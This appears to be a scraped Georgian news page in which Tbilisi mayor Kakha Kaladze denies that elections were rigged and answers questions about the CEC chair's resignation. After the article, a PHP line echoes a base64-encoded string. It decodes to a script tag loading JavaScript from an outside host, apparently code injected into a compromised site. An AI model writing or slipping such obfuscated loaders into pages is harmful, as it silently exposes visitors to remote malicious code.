celsiusi
ავერსი საქკაბელი
დედაქალაქის მერის კახა კალაძის თქმით, არჩევნები არ გაყალბებულა და ამის მტკიცებულება არის ის შეთანხმება, რომელიც შედგა და ის, რომ კონკრეტული პარტიები პარლამენტში შედიან. ამის შესახებ თბილისის მერმა,  ჟურნალისტებს კითხვაზე- უნდა გადადგეს თუ არა თანამდებობიდან ცესკო-ს თავმჯდომარე, თამარ ჟვანია პასუხისას განუმარტა.
 
კალაძის თქმით, არჩევნების შესაძლო გაყალბების არც ერთი მტკიცებულება არ არსებობს.
 
„რა თქმა უნდა, არჩევნები არ გაყალბებულა. ამის ვერანაირი მტკიცებულება ვერ წარმოადგინეს, მიუხედავად იმისა, რომ ჩვენი მხრიდან იყო შეთავაზება და ეს შეთავაზება დღესაც არის, რომ მოხდეს საპარლამენტო კომისიის შექმნა, სადაც შესაძლებელი იქნებოდა ყველა უბანი გადათვლილიყო, გახსნილიყო, ენახა ადამიანებს მართლა გაყალბდა თუ არა. თუმცა, ეს არ მოისურვეს იმიტომ, რომ ძალიან კარგად იციან, არაფერი გაყალბებულა",-განაცხადა კალაძემ.
 
1773
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");